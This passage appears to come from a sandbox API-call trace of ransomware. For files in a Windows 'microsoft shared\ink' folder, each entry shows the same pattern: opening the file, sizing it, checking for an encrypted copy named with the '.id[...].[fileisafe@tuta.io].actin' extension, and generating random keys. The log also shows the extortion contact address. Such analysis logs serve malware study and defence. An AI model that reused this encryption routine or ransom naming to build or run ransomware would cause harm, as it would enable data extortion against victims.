dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.969] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2652) returned 1 [0146.969] CloseHandle (hObject=0x2f4) returned 1 [0146.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0x20 [0146.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.969] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.969] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2570) returned 1 [0146.969] CloseHandle (hObject=0x2f4) returned 1 [0146.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml")) returned 0x20 [0146.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.970] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.971] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2526) returned 1 [0146.971] CloseHandle (hObject=0x2f4) returned 1 [0146.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0x20 [0146.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.971] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.971] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2522) returned 1 [0146.971] CloseHandle (hObject=0x2f4) returned 1 [0146.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0x20 [0146.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.972] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.972] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2568) returned 1 [0146.972] CloseHandle (hObject=0x2f4) returned 1 [0146.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0x20 [0146.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.972] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.973] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=41984) returned 1 [0146.973] CloseHandle (hObject=0x2f4) returned 1 [0146.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll")) returned 0x20 [0146.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.973] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.974] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2626) returned 1 [0146.974] CloseHandle (hObject=0x2f4) returned 1 [0146.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0146.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.974] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.975] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2580) returned 1 [0146.975] CloseHandle (hObject=0x2f4) returned 1 [0146.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0x20 [0146.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.975] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.975] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2600) returned 1 [0146.975] CloseHandle (hObject=0x2f4) returned 1 [0146.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0146.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.976] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.976] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=125952) returned 1 [0146.976] CloseHandle (hObject=0x2f4) returned 1 [0146.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll")) returned 0x20 [0146.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.976] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.977] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2246) returned 1 [0146.977] CloseHandle (hObject=0x2f4) returned 1 [0146.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0146.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.977] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.977] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2240) returned 1 [0146.977] CloseHandle (hObject=0x2f4) returned 1 [0146.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0146.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.978] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.978] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2644) returned 1 [0146.978] CloseHandle (hObject=0x2f4) returned 1 [0146.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0146.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.979] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.979] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2542) returned 1 [0146.979] CloseHandle (hObject=0x2f4) returned 1 [0146.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0x20 [0146.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.979] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.980] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2568) returned 1 [0146.980] CloseHandle (hObject=0x2f4) returned 1 [0146.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0x20 [0146.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.980] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.980] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2596) returned 1 [0146.980] CloseHandle (hObject=0x2f4) returned 1 [0146.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0x20 [0146.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.981] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.981] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2520) returned 1 [0146.981] CloseHandle (hObject=0x2f4) returned 1 [0146.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml")) returned 0x20 [0146.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.982] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.982] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2720) returned 1 [0146.982] CloseHandle (hObject=0x2f4) returned 1 [0146.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml")) returned 0x20 [0146.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0xc0000000, 